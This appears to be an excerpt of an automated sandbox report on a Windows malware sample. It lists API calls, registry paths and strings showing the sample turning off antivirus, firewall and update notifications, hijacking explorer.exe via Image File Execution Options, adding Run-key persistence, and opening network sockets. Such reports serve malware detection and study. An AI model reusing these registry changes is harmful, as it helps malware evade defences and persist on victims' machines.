                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 00405B95
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405BA7
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU,?), ref: 00405BF2
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,NoAutoUpdate,00000000,00000004,?,00000004), ref: 00405C1B
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405C2A
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,?,?,?,?,?), ref: 00405C9C
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,AntiVirusOverride,00000000,00000004,?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405CC5
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,AntiVirusDisableNotify,00000000,00000004,?,00000004,?,AntiVirusOverride,00000000,00000004,?,00000004), ref: 00405CDD
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,FirewallDisableNotify,00000000,00000004,?,00000004,?,AntiVirusDisableNotify,00000000,00000004,?,00000004,?,AntiVirusOverride,00000000,00000004), ref: 00405CF5
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,UpdatesDisableNotify,00000000,00000004,?,00000004,?,FirewallDisableNotify,00000000,00000004,?,00000004,?,AntiVirusDisableNotify,00000000,00000004), ref: 00405D0D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405D1C
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,0002001F,?,?,?,?,?,00020006,?,?,?,?,?), ref: 00405D52
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(?,00000000,?,?,?,0002001F,?,?,?,?,?,00020006,?), ref: 00405DCE
                                                                                                                                                                      • RegEnumValueA.ADVAPI32(?,?,00000000,?,00000000,?,00004000,00004000), ref: 00405E0A
                                                                                                                                                                      • wsprintfA.USER32 ref: 00405E24
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000001,?,?,?,?,0002001F,?), ref: 00405E3B
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?), ref: 00405E54
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00010000,00402818,00000002,00000000,?), ref: 00405E77
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405E80
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021), ref: 00405F00
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 00405F1D
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00407382,00000000,00000004,00000001,00000004), ref: 00405F5D
                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000004), ref: 00405F66
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,0040738E,00000000,00000001,?,00000001), ref: 00405F81
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00405F90
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 00405FAC
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 00405FC6
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405FE6
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00407379,00000000,00000001,?,00000001), ref: 00406001
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00406010
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 00406039
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 0040605A
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?), ref: 00406071
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040608D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040609C
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,004074E0,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 004060D6
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,004074E0,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 00406102
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,0040751C,00000000,00000003,?,0000022A,?,?,0040F4FC,?,00000000), ref: 0040612E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,0000022A,?,?,0040F4FC,?,00000000,?,?,?,?,?,?,?,?,00000001), ref: 0040613D
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00406152
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,00407240,?), ref: 0040617C
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040619C
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00407588,00000000,00000001,?,00000001), ref: 004061B7
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00407590,00000000,00000001,00407590,00000008,?,00407588,00000000,00000001,?,00000001), ref: 004061D3
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 004061E2
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000000,004075A0,?), ref: 00406204
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040621B
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 00406233
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00407651,00000000,00000001,00407660,00000005,?,00000000,00000000,00000001,?,00000001), ref: 0040624F
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 0040625E
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,004075E0,?), ref: 00406271
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00406287
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 0040629C
                                                                                                                                                                      • Sleep.KERNEL32(000003E8,00000021,?,?,?,?,?,?,?,00000001), ref: 004062A9
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,004074E0,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 004062DF
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00407527,00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 0040631D
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00407527,00000000,00000004,?,00000004,?,?,?,?,?,?,00000000,?,00000000), ref: 00406356
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(?,00407527,?,?,?,?,?,?,00000000,?,00000000), ref: 0040636F
                                                                                                                                                                      • Sleep.KERNEL32(00001388,00407527,?,?,?,?,?,?,00000000,?,00000000), ref: 0040637C
                                                                                                                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 004063B8
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 004063CA
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004063E1
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00412170,?,?,?,0040F4FC,?,00000000), ref: 004063F8
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040F48A), ref: 00406409
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Close$Create$Value$Handle$AddressProclstrcat$Attributes$Process$lstrlen$DeleteOpenWritelstrcpy$EnvironmentExpandStrings$CurrentLibraryLoadTempTime$DirectoryErrorExitLastNameObjectProcess32SingleSleepSystemWaitlstrcmpi$MutexPathQueryReadStartupThreadwsprintf$FirstInfoNextPointerSizeSnapshotToolhelp32$ClassCommandComputerCountEnumHeapLineModulePriorityTerminateTickVersionWindows
                                                                                                                                                                      • String ID: %02X$--k33p$AntiVirusDisableNotify$AntiVirusOverride$FirewallDisableNotify$GetIpAddrTable$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$NoAutoUpdate$QlC5hT0yHn63XEm5LqJ2OxSkGj2v$RasEnumConnectionsA$SOFTWARE\Microsoft\Active Setup\Installed Components\$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$Software\Microsoft\Windows\CurrentVersion\Run$UpdatesDisableNotify$f$kernel32.dll$sOfTwaRe\mIcRoSofT\cOdE SToRe dAtAbAsE\Distribution Units\{79AABB1D-FADB-7161-3CCB-997899295A29}$tmp${10F5781A-0D97-0F99-EF77-BA382916E579}${4D415259-4a4f-4e45-5334-4D4152594a4f}${9703941E-446E-952F-954A-3DA8A91ED84F}
                                                                                                                                                                      • API String ID: 2347958643-2732280316
                                                                                                                                                                      • Opcode ID: 4815703a75f863ab10b100253ed1074a169afd28bfc9926a5a05f6dc8c284ea3
                                                                                                                                                                      • Instruction ID: fcd3a91cfab7fa25ee27508f4df0295c9928967f58dd1d1f7e7acfc0775f1f2c
                                                                                                                                                                      • Opcode Fuzzy Hash: 4815703a75f863ab10b100253ed1074a169afd28bfc9926a5a05f6dc8c284ea3
                                                                                                                                                                      • Instruction Fuzzy Hash: D1233BB19443406AE630B6349D47F9B3A989B40318F140A3FFA89B61D3E77C9529C79F
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                      • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,0040F4EE,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,0040F4EE,00000000,00000003,00412170,00000012), ref: 004039EE
                                                                                                                                                                      • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: TimeValue$FileSleepSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1870287861-0
                                                                                                                                                                      • Opcode ID: d0b6cef66b800da90ba3467bf04fa9bfb8d2020867b52d5de8f0e7a8069a1da6
                                                                                                                                                                      • Instruction ID: 2ee653d2f7df55df6907a0a9b2e57412953aa95c4ecf6cadf6b3b4d2485eddb3
                                                                                                                                                                      • Opcode Fuzzy Hash: d0b6cef66b800da90ba3467bf04fa9bfb8d2020867b52d5de8f0e7a8069a1da6
                                                                                                                                                                      • Instruction Fuzzy Hash: E412D3B0A002149FDB20EF28CD45B997BB5AF45304F1482FAE808B73D1D7799A85CF59
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004019BF
                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00401A0A
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401C12
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                      • String ID: T2A
                                                                                                                                                                      • API String ID: 1083639309-2019523081
                                                                                                                                                                      • Opcode ID: 3b0f47bd1a5bf9f8010e0a9d41935c21d537d6427fc48c9c7731a0199396ee73
                                                                                                                                                                      • Instruction ID: 7c6136f779b091b801ec7ced044d4ecd4f532b5644714f746006db05a6c2f320
                                                                                                                                                                      • Opcode Fuzzy Hash: 3b0f47bd1a5bf9f8010e0a9d41935c21d537d6427fc48c9c7731a0199396ee73
                                                                                                                                                                      • Instruction Fuzzy Hash: 627108706482009BE710AB24DD41B9B3BB8AB45348F04453AF945E72E1F37CE669CB9A
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                      • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 004038FD
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,0040F4EE,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,0040F4EE,00000000,00000003,00412170,00000012), ref: 004039EE
                                                                                                                                                                      • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SleepTimeValue$FileSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 104937078-0
                                                                                                                                                                      • Opcode ID: 59f52d4308e26f2c8992c92d3b2c4a8336bb46f4176d7e8b4135a0017782744e
                                                                                                                                                                      • Instruction ID: 51207a69c6f84e7cd26efe5e5962b9edc78a43a6ad57510283d07de6baf8f7fe
                                                                                                                                                                      • Opcode Fuzzy Hash: 59f52d4308e26f2c8992c92d3b2c4a8336bb46f4176d7e8b4135a0017782744e
                                                                                                                                                                      • Instruction Fuzzy Hash: 94C12C71A002149BDB20DF38CD49BD977B5AF44304F1082B6E509F72D1E7B99A58CF5A
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 00402065
                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?), ref: 0040206E
                                                                                                                                                                      • htons.WS2_32(00000000), ref: 004020C9
                                                                                                                                                                      • inet_addr.WS2_32(?), ref: 004020F0
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00402107
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040213E
                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00402169
                                                                                                                                                                      • wsprintfA.USER32 ref: 004021B5
                                                                                                                                                                      • send.WS2_32(00000000,?,00000000,00000000), ref: 004021C5
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,0040748A), ref: 00402206
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: closesocketgethostbynamehtonsinet_addrlstrcmpilstrcpylstrlensendsocketwsprintf
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 2963668025-4108050209
                                                                                                                                                                      • Opcode ID: c5914518efa31e6daf1d6d1c5ad6aede4384d13f612d860edefc583a5bee64dd
                                                                                                                                                                      • Instruction ID: 67f1582d9d65064009b7b38dedaf8d45dcb20af8a74f6ab8ff9eb660a5d02e62
                                                                                                                                                                      • Opcode Fuzzy Hash: c5914518efa31e6daf1d6d1c5ad6aede4384d13f612d860edefc583a5bee64dd
                                                                                                                                                                      • Instruction Fuzzy Hash: 83810DB0E002045BD710AB749E49B5F76B8AB05314F0441B6EB05FB2D1E7FC9A59C79E
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,00407160,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,0040228C), ref: 00401720
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 00401751
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00407120,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 0040177F
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,00020019,?,00407120,?,?,?,?,?,?,?,00001000,00000000,?), ref: 00401795
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,004071A8,00000000,?,?,?,?,?,?,00020019,?,00407120), ref: 004017D2
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,004071B4,00000000,00020019,?,?,?,?,?,?,?,?,?,00020019,?,00407120), ref: 00401817
                                                                                                                                                                      • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,00001000), ref: 0040189E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004018BD
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00020019,?,00407120), ref: 004018CF
                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(80000003,?,?,00001000), ref: 004018E8
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 004018FF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$EnumOpenValue$CreateQuerylstrcatlstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1447802672-0
                                                                                                                                                                      • Opcode ID: c2f4eb5dcb65888f86c7ad64f5aeb95159d8d2dc340fff86f7741a61dcbf7091
                                                                                                                                                                      • Instruction ID: 66e194334fdec41dc41c183a83ee0e0423d2cbbda799cea80f6bf4481fa86f55
                                                                                                                                                                      • Opcode Fuzzy Hash: c2f4eb5dcb65888f86c7ad64f5aeb95159d8d2dc340fff86f7741a61dcbf7091
                                                                                                                                                                      • Instruction Fuzzy Hash: 2941EEB2904344AAF73176219C0AF9B7B9C9B44348F14443FFE88B51D3E279962CC667
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004049C8,?,00000100,?,?,00000104), ref: 00401549
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,00000100,?,?,00000104), ref: 0040156D
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00401588
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,00001000,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004015F1
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401601
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401607
                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 0040160D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateHandle$AttributesDeleteRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3513576528-0
                                                                                                                                                                      • Opcode ID: 0d9829dfa8e08aa6c7748854afdc2d091dcfa343b8acebea5d3c5eb7fafc4fb7
                                                                                                                                                                      • Instruction ID: ead9107263b76718dec6335517b8b67c7343bef8d8983c19364d90e74fa0285a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d9829dfa8e08aa6c7748854afdc2d091dcfa343b8acebea5d3c5eb7fafc4fb7
                                                                                                                                                                      • Instruction Fuzzy Hash: 8021A1B1A802007AE53031757C03F5B369C8B84758F190A3BFE06B91D6F5BDE62941AF
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00401393
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013AF
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013C9
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,?), ref: 004013D9
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004013ED
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 004013FC
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 00401405
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle$Create$FileInfoObjectProcessSingleStartupWait
                                                                                                                                                                      • String ID: --k33p
                                                                                                                                                                      • API String ID: 881816827-1573217081
                                                                                                                                                                      • Opcode ID: 23540df0282b53dc4e0cdbe067ed9abf83ee08cd0daae6381b3e11d49cf6d48d
                                                                                                                                                                      • Instruction ID: 3f95ffb7ecc753adf67741720bf5132c3bbf7ea7650a4e902ed5c82167082f99
                                                                                                                                                                      • Opcode Fuzzy Hash: 23540df0282b53dc4e0cdbe067ed9abf83ee08cd0daae6381b3e11d49cf6d48d
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C01813180420476D6213A36AC07F0F7FA89B4576CF210A3DF959351EAE67D663D42AF
                                                                                                                                                                      APIs
                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401D9F
                                                                                                                                                                      • connect.WS2_32(00000000,?,00000010), ref: 00401DB3
                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401DC9
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00401DDB
                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00401DF8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
